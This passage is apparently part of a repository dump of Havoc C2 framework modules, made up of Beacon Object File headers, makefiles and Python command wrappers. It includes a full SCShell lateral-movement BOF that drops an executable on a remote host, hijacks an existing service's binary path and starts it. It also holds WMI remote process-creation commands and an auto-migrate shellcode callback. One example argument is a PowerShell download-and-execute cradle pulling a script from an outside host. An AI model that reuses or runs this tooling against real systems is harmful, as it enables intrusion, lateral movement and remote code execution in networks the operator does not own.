DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); -------------------------------------------------------------------------------- /Jump-exec/ScShell/makefile: -------------------------------------------------------------------------------- 1 | BOF := scshell 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | STRIP_x86 := i686-w64-mingw32-strip 6 | 7 | all: 8 | $(CC_x64) -o $(BOF).x64.o -c $(BOF).c 9 | $(STRIP_x64) --strip-unneeded $(BOF).x64.o 10 | $(CC_x86) -o $(BOF).x86.o -c $(BOF).c 11 | $(STRIP_x86) --strip-unneeded $(BOF).x86.o 12 | 13 | clean: 14 | rm $(BOF).o -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.c: -------------------------------------------------------------------------------- 1 | /* 2 | Full credit goes to Mr-Un1k0d3r. This bof is based on his implementation https://github.com/Mr-Un1k0d3r/SCShell/blob/master/CS-BOF/scshellbof.c 3 | */ 4 | 5 | #include 6 | #include "beacon.h" 7 | 8 | /* Defines */ 9 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA( 10 | LPCSTR lpFileName, 11 | DWORD dwDesiredAccess, 12 | DWORD dwShareMode, 13 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 14 | DWORD dwCreationDisposition, 15 | DWORD dwFlagsAndAttributes, 16 | HANDLE hTemplateFile 17 | ); 18 | 19 | WINBASEAPI BOOL WINAPI KERNEL32$WriteFile( 20 | HANDLE hFile, 21 | LPCVOID lpBuffer, 22 | DWORD nNumberOfBytesToWrite, 23 | LPDWORD lpNumberOfBytesWritten, 24 | LPOVERLAPPED lpOverlapped 25 | ); 26 | 27 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA( 28 | LPCSTR lpMachineName, 29 | LPCSTR lpDatabaseName, 30 | DWORD dwDesiredAccess 31 | ); 32 | 33 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA( 34 | SC_HANDLE hSCManager, 35 | LPCSTR lpServiceName, 36 | DWORD dwDesiredAccess 37 | ); 38 | 39 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA( 40 | SC_HANDLE hService, 41 | DWORD dwNumServiceArgs, 42 | LPCSTR* lpServiceArgVectors 43 | ); 44 | 45 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA( 46 | SC_HANDLE hService, 47 | LPQUERY_SERVICE_CONFIGA lpServiceConfig, 48 | DWORD cbBufSize, 49 | LPDWORD pcbBytesNeeded 50 | ); 51 | 52 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA( 53 | SC_HANDLE hService, 54 | DWORD dwServiceType, 55 | DWORD dwStartType, 56 | DWORD dwErrorControl, 57 | LPCSTR lpBinaryPathName, 58 | LPCSTR lpLoadOrderGroup, 59 | LPDWORD lpdwTagId, 60 | LPCSTR lpDependencies, 61 | LPCSTR lpServiceStartName, 62 | LPCSTR lpPassword, 63 | LPCSTR lpDisplayName 64 | ); 65 | 66 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle( SC_HANDLE hSCObject ); 67 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService( SC_HANDLE hService ); 68 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(); 69 | WINBASEAPI VOID WINAPI KERNEL32$CloseHandle( HANDLE Handle ); 70 | WINBASEAPI HLOCAL WINAPI KERNEL32$LocalAlloc( UINT, SIZE_T ); 71 | WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree( HLOCAL ); 72 | 73 | 74 | /* scshell entrypoint code */ 75 | VOID go( PVOID Buffer, ULONG Length ) 76 | { 77 | datap Parser = { 0 }; 78 | DWORD SvcBinarySize = 0; 79 | DWORD Written = 0; 80 | DWORD SvcQuerySize = 0; 81 | PCHAR Host = NULL; 82 | PCHAR SvcName = NULL; 83 | PCHAR SvcBinary = NULL; 84 | PCHAR SvcPath = NULL; 85 | BOOL Success = FALSE; 86 | 87 | HANDLE hFile = NULL; 88 | HANDLE hSvcManager = NULL; 89 | HANDLE hSvcService = NULL; 90 | 91 | LPQUERY_SERVICE_CONFIGA SvcConfig = NULL; 92 | PCHAR SvcOrgPath = NULL; 93 | DWORD SvcConfSize = 0; 94 | 95 | /* Prepare our argument buffer */ 96 | BeaconDataParse( &Parser, Buffer, Length ); 97 | 98 | /* Parse our arguments */ 99 | Host = BeaconDataExtract( &Parser, NULL ); 100 | SvcName = BeaconDataExtract( &Parser, NULL ); 101 | SvcBinary = BeaconDataExtract( &Parser, &SvcBinarySize ); 102 | SvcPath = BeaconDataExtract( &Parser, NULL ); 103 | 104 | /* Upload service file to target machine (overwrite existing file)*/ 105 | hFile = KERNEL32$CreateFileA( SvcPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL ); 106 | if ( hFile == INVALID_HANDLE_VALUE ) 107 | { 108 | BeaconPrintf( CALLBACK_ERROR, "CreateFileA Failed: %d", KERNEL32$GetLastError() ); 109 | goto EXIT; 110 | } 111 | 112 | if ( ! KERNEL32$WriteFile( hFile, SvcBinary, SvcBinarySize, &Written, NULL ) ) 113 | { 114 | BeaconPrintf( CALLBACK_ERROR, "WriteFile Failed: %d", KERNEL32$GetLastError() ); 115 | goto EXIT; 116 | } 117 | 118 | BeaconPrintf( CALLBACK_OUTPUT, "Dropped service executable on %s at %s", Host, SvcPath ); 119 | 120 | /* Close the file */ 121 | KERNEL32$CloseHandle( hFile ); 122 | hFile = NULL; 123 | 124 | /* Open Service manager. Create and start our service. The magic happens here :P */ 125 | // NOTE: OpenSCManagerA is going to use SERVICES_ACTIVE_DATABASE by default if lpDatabaseName == NULL. 126 | hSvcManager = ADVAPI32$OpenSCManagerA( Host, NULL, SC_MANAGER_ALL_ACCESS ); 127 | if ( ! hSvcManager ) 128 | { 129 | BeaconPrintf( CALLBACK_ERROR, "OpenSCManagerA Failed: %x", KERNEL32$GetLastError() ); 130 | goto EXIT; 131 | } 132 | 133 | hSvcService = ADVAPI32$OpenServiceA( hSvcManager, SvcName, SERVICE_ALL_ACCESS ); 134 | if ( ! hSvcService ) 135 | { 136 | BeaconPrintf( CALLBACK_ERROR, "OpenServiceA Failed: %d", KERNEL32$GetLastError() ); 137 | goto EXIT; 138 | } 139 | 140 | SvcQuerySize = 0; 141 | ADVAPI32$QueryServiceConfigA( hSvcService, NULL, 0, &SvcQuerySize ); 142 | if ( SvcQuerySize ) 143 | { 144 | SvcConfSize = SvcQuerySize; 145 | SvcConfig = KERNEL32$LocalAlloc( LPTR, SvcQuerySize ); 146 | SvcQuerySize = 0; 147 | if ( ! ADVAPI32$QueryServiceConfigA( hSvcService, SvcConfig, SvcConfSize, &SvcQuerySize ) ) 148 | { 149 | BeaconPrintf( CALLBACK_ERROR, "QueryServiceConfigA [2]. Failed: %d", KERNEL32$GetLastError() ); 150 | goto EXIT; 151 | } 152 | 153 | SvcOrgPath = SvcConfig->lpBinaryPathName; 154 | BeaconPrintf( CALLBACK_OUTPUT, "Service original path: %s\n", SvcOrgPath ); 155 | } 156 | 157 | if ( ! ADVAPI32$ChangeServiceConfigA( hSvcService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, SvcPath, NULL, NULL, NULL, NULL, NULL, NULL ) ) 158 | { 159 | BeaconPrintf( CALLBACK_ERROR, "ChangeServiceConfigA Failed: %d", KERNEL32$GetLastError() ); 160 | goto EXIT; 161 | } 162 | 163 | BeaconPrintf( CALLBACK_OUTPUT, "Service path changed to: %s", SvcPath ); 164 | 165 | // TODO: check if service is dead after starting it. maybe we trying to start a buggy one... 166 | // TODO: add check for ERROR_SERVICE_REQUEST_TIMEOUT 167 | if ( ! ADVAPI32$StartServiceA( hSvcService, 0, NULL ) ) 168 | { 169 | BeaconPrintf( CALLBACK_ERROR, "CreateServiceA Failed: %x", KERNEL32$GetLastError() ); 170 | goto EXIT; 171 | } 172 | BeaconPrintf( CALLBACK_OUTPUT, "Service %s started", SvcName ); 173 | 174 | if ( SvcOrgPath ) 175 | { 176 | if ( ! ADVAPI32$ChangeServiceConfigA( hSvcService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, SvcOrgPath, NULL, NULL, NULL, NULL, NULL, NULL ) ) 177 | { 178 | BeaconPrintf( CALLBACK_ERROR, "ChangeServiceConfigA Failed: %x", KERNEL32$GetLastError() ); 179 | goto EXIT; 180 | } 181 | BeaconPrintf( CALLBACK_OUTPUT, "Service path restored to original: %s", SvcOrgPath ); 182 | } 183 | 184 | Success = TRUE; 185 | 186 | EXIT: 187 | if ( hFile ) 188 | { 189 | KERNEL32$CloseHandle( hFile ); 190 | hFile = NULL; 191 | } 192 | 193 | if ( ! ADVAPI32$DeleteService( hSvcService ) ) 194 | BeaconPrintf( CALLBACK_ERROR, "Failed to delete Service %s on %s: %d", SvcName, Host, KERNEL32$GetLastError() ); 195 | 196 | if ( SvcConfig ) 197 | { 198 | KERNEL32$LocalFree( SvcConfig ); 199 | SvcConfig = NULL; 200 | } 201 | 202 | if ( hSvcService ) 203 | { 204 | ADVAPI32$CloseServiceHandle( hSvcService ); 205 | hSvcService = NULL; 206 | } 207 | 208 | if ( hSvcManager ) 209 | { 210 | ADVAPI32$CloseServiceHandle( hSvcManager ); 211 | hSvcManager = NULL; 212 | } 213 | 214 | if ( Success ) 215 | BeaconPrintf( CALLBACK_OUTPUT, "scshell successful executed on %s", Host ); 216 | else 217 | BeaconPrintf( CALLBACK_ERROR, "scshell failed to execut on %s", Host ); 218 | } 219 | -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | from os.path import exists 3 | 4 | def scshell( demonID, *params ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer : Packer = Packer() 8 | 9 | Host : str = "" 10 | SvcName : str = "" 11 | SvcPath : str = "" 12 | SvcBinary : bytes = b'' 13 | 14 | demon = Demon( demonID ) 15 | 16 | if len(params) < 2: 17 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough arguments" ) 18 | return 19 | else: 20 | Host = params[ 0 ] 21 | SvcName = params[ 1 ] 22 | SvcPath = params[ 2 ] 23 | 24 | if exists( SvcPath ) == False: 25 | demon.ConsoleWrite( demon.CONSOLE_ERROR, f"Service executable not found: {SvcPath}" ) 26 | return 27 | else: 28 | SvcBinary = open( SvcPath, 'rb' ).read() 29 | if len(SvcBinary) == 0: 30 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Specified service executable is empty" ) 31 | return 32 | 33 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to execute {SvcPath} on {Host} using scshell" ) 34 | 35 | packer.addstr( Host ) 36 | packer.addstr( SvcName ) 37 | packer.addstr( SvcBinary ) 38 | packer.addstr( "\\\\" + Host + "\\C$\\Windows\\" + SvcName + ".exe" ) 39 | 40 | demon.InlineExecute( TaskID, "go", f"scshell.{demon.ProcessArch}.o", packer.getbuffer(), False ) 41 | 42 | return TaskID 43 | 44 | RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" ) 45 | RegisterCommand( scshell, "jump-exec", "scshell", "Changes service executable path of an existing service to our specified service executable over RPC", 0, "[Host] [Target Service Name] [Local Path]", "DOMAIN-DC AppVClient /tmp/MyAgentSvc.exe" ) 46 | -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/ScShell/scshell.x64.o -------------------------------------------------------------------------------- /Jump-exec/ScShell/scshell.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/ScShell/scshell.x86.o -------------------------------------------------------------------------------- /Jump-exec/WMI/EventSub/bin/EventSub.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/WMI/EventSub/bin/EventSub.x64.o -------------------------------------------------------------------------------- /Jump-exec/WMI/EventSub/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); 60 | 61 | /* Utility Functions */ 62 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 63 | -------------------------------------------------------------------------------- /Jump-exec/WMI/EventSub/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := EventSub 2 | CC_x64 := x86_64-w64-mingw32-g++ 3 | CC_x86 := i686-w64-mingw32-g++ 4 | 5 | all: 6 | $(CC_x64) -o bin/$(BOFNAME).x64.o -c source/WMI-EventSub.cpp -I include -w 7 | -------------------------------------------------------------------------------- /Jump-exec/WMI/ProcCreate/bin/ProcCreate.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Jump-exec/WMI/ProcCreate/bin/ProcCreate.x64.o -------------------------------------------------------------------------------- /Jump-exec/WMI/ProcCreate/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess (BOOL x86, BOOL ignoreToken, STARTUPINFO * sInfo, PROCESS_INFORMATION * pInfo); 60 | 61 | /* Utility Functions */ 62 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 63 | -------------------------------------------------------------------------------- /Jump-exec/WMI/ProcCreate/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := ProcCreate 2 | CC_x64 := x86_64-w64-mingw32-g++ 3 | 4 | all: 5 | $(CC_x64) -o bin/$(BOFNAME).x64.o -c source/WMI-ProcessCreate.cpp -I include -l comsuppw -l comsuppwd -w 6 | -------------------------------------------------------------------------------- /Jump-exec/WMI/makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */) 2 | 3 | .PHONY: all $(SUBDIRS) 4 | 5 | all: $(SUBDIRS) 6 | 7 | $(SUBDIRS): 8 | @if [ -f $@/makefile ]; then \ 9 | echo "Building $@"; \ 10 | $(MAKE) -C $@; \ 11 | else \ 12 | echo "Skipping $@ (makefile not found)"; \ 13 | fi 14 | -------------------------------------------------------------------------------- /Jump-exec/WMI/wmi.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | import re 3 | 4 | def wmi_eventsub( demonID, *params ): 5 | TaskID : str = None 6 | demon : Demon = None 7 | packer = Packer() 8 | demon = Demon( demonID ) 9 | 10 | if demon.ProcessArch == 'x86': 11 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" ) 12 | return False 13 | 14 | num_params = len(params) 15 | 16 | target = '' 17 | username = '' 18 | password = '' 19 | domain = '' 20 | is_current = True 21 | 22 | if num_params < 2: 23 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" ) 24 | return False 25 | 26 | if num_params > 5: 27 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" ) 28 | return False 29 | 30 | target = f'\\\\{params[ 0 ]}\\ROOT\\SUBSCRIPTION' 31 | 32 | try: 33 | with open(params[ 1 ], 'r') as f: 34 | vbscript = f.read() 35 | except Exception as e: 36 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Invalid vbscript path" ) 37 | return False 38 | 39 | if num_params > 2 and num_params < 5: 40 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" ) 41 | return False 42 | 43 | if num_params == 5: 44 | is_current = False 45 | username = params[ 3 ] 46 | password = params[ 4 ] 47 | domain = params[ 5 ] 48 | 49 | packer.addWstr(target) 50 | packer.addWstr(domain) 51 | packer.addWstr(username) 52 | packer.addWstr(password) 53 | packer.addWstr(vbscript) 54 | packer.addbool(is_current) 55 | 56 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to run a VBS script in {target} via wmi" ) 57 | 58 | demon.InlineExecute( TaskID, "go", f"EventSub/bin/EventSub.{demon.ProcessArch}.o", packer.getbuffer(), False ) 59 | 60 | return TaskID 61 | 62 | def wmi_proccreate( demonID, *params ): 63 | TaskID : str = None 64 | demon : Demon = None 65 | packer = Packer() 66 | demon = Demon( demonID ) 67 | 68 | if demon.ProcessArch == 'x86': 69 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "x86 is not supported" ) 70 | return False 71 | 72 | num_params = len(params) 73 | 74 | target = '' 75 | username = '' 76 | password = '' 77 | domain = '' 78 | command = '' 79 | is_current = True 80 | 81 | if num_params < 2: 82 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" ) 83 | return False 84 | 85 | if num_params > 5: 86 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" ) 87 | return False 88 | 89 | target = f'\\\\{params[ 0 ]}\\ROOT\\CIMV2' 90 | command = params[ 1 ] 91 | 92 | if num_params > 2 and num_params < 5: 93 | demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" ) 94 | return False 95 | 96 | if num_params == 6: 97 | is_current = False 98 | username = params[ 2 ] 99 | password = params[ 3 ] 100 | domain = params[ 4 ] 101 | 102 | packer.addWstr(target) 103 | packer.addWstr(domain) 104 | packer.addWstr(username) 105 | packer.addWstr(password) 106 | packer.addWstr(command) 107 | packer.addbool(is_current) 108 | 109 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to run command on {target} via wmi" ) 110 | 111 | demon.InlineExecute( TaskID, "go", f"ProcCreate/bin/ProcCreate.{demon.ProcessArch}.o", packer.getbuffer(), False ) 112 | 113 | return TaskID 114 | 115 | RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" ) 116 | RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path ", "10.10.10.10 /tmp/demon.vba" ) 117 | RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command ", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" ) 118 | -------------------------------------------------------------------------------- /Jump-exec/makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */) 2 | 3 | .PHONY: all $(SUBDIRS) 4 | 5 | all: $(SUBDIRS) 6 | 7 | $(SUBDIRS): 8 | @if [ -f $@/makefile ]; then \ 9 | echo "Building $@"; \ 10 | $(MAKE) -C $@; \ 11 | else \ 12 | echo "Skipping $@ (makefile not found)"; \ 13 | fi 14 | -------------------------------------------------------------------------------- /Migrate/auto_migrate.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCallback 2 | 3 | def new_demon( demonID ): 4 | demon : Demon = None 5 | demon = Demon( demonID ) 6 | 7 | if demon.OSArch.startswith(demon.ProcessArch) is False: 8 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"migrating to x64" ) 9 | demon.Command(TaskID, 'shellcode spawn x64 /tmp/demon.x64.bin') 10 | 11 | RegisterCallback(new_demon) 12 | -------------------------------------------------------------------------------- /NoConsolation/bin/NoConsolation.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/NoConsolation/bin/NoConsolation.x64.o -------------------------------------------------------------------------------- /NoConsolation/bin/NoConsolation.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/NoConsolation/bin/NoConsolation.x86.o -------------------------------------------------------------------------------- /NoConsolation/makefile: -------------------------------------------------------------------------------- 1 | NAME = No-Consolation 2 | BIN = bin 3 | 4 | all: 5 | @ cd $(NAME); make 6 | @ find $(NAME)/dist -name '*.o' -exec cp {} $(BIN)/ \; 7 | 8 | clean: 9 | rm $(BIN)/*.o 10 | -------------------------------------------------------------------------------- /Packer/packer.py: -------------------------------------------------------------------------------- 1 | from struct import pack, calcsize 2 | 3 | # 4 | # this is a helper class 5 | # 6 | 7 | class Packer: 8 | def __init__(self): 9 | self.buffer : bytes = b'' 10 | self.size : int = 0 11 | 12 | def getbuffer(self): 13 | return pack(" 3 | #include 4 | #include 5 | 6 | typedef struct _INSTANCE { 7 | 8 | struct { 9 | 10 | WIN32_FUNC( printf ) 11 | WINBASEAPI HRESULT ( WINAPI *CLRCreateInstance ) ( REFCLSID clsid, REFIID riid, LPVOID* ppInterface ); 12 | 13 | } Win32; 14 | 15 | struct { 16 | 17 | PVOID Msvcrt; 18 | PVOID Mscoree; 19 | 20 | } Modules; 21 | 22 | } INSTANCE, *PINSTANCE; 23 | 24 | extern INSTANCE Instance; 25 | 26 | VOID ModuleInit(); 27 | VOID ModuleMain(); -------------------------------------------------------------------------------- /PowerPick/include/KaynLdr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #ifndef KAYNLDR_KAYNLDR_H 7 | #define KAYNLDR_KAYNLDR_H 8 | 9 | #define _NO_NTDLL_CRT_ 10 | 11 | #include 12 | #include 13 | 14 | #define DLL_QUERY_HMODULE 6 15 | 16 | #define HASH_KEY 5381 17 | 18 | #ifdef _WIN64 19 | #define PPEB_PTR __readgsqword( 0x60 ) 20 | #else 21 | #define PPEB_PTR __readgsqword( 0x30 ) 22 | #endif 23 | 24 | #define MemCopy __builtin_memcpy 25 | #define NTDLL_HASH 0x70e61753 26 | 27 | #define SYS_LDRLOADDLL 0x9e456a43 28 | #define SYS_NTALLOCATEVIRTUALMEMORY 0xf783b8ec 29 | #define SYS_NTPROTECTEDVIRTUALMEMORY 0x50e92888 30 | 31 | #define DLLEXPORT __declspec( dllexport ) 32 | #define WIN32_FUNC( x ) __typeof__( x ) * x; 33 | 34 | #define U_PTR( x ) ( ( UINT_PTR ) x ) 35 | #define C_PTR( x ) ( ( LPVOID ) x ) 36 | 37 | typedef struct { 38 | 39 | struct { 40 | WIN32_FUNC( LdrLoadDll ); 41 | WIN32_FUNC( NtAllocateVirtualMemory ) 42 | WIN32_FUNC( NtProtectVirtualMemory ) 43 | } Win32; 44 | 45 | struct { 46 | PVOID Ntdll; 47 | } Modules ; 48 | 49 | } KAYNINSTANCE, *PKAYNINSTANCE ; 50 | 51 | LPVOID KaynCaller(); 52 | 53 | typedef struct { 54 | WORD offset :12; 55 | WORD type :4; 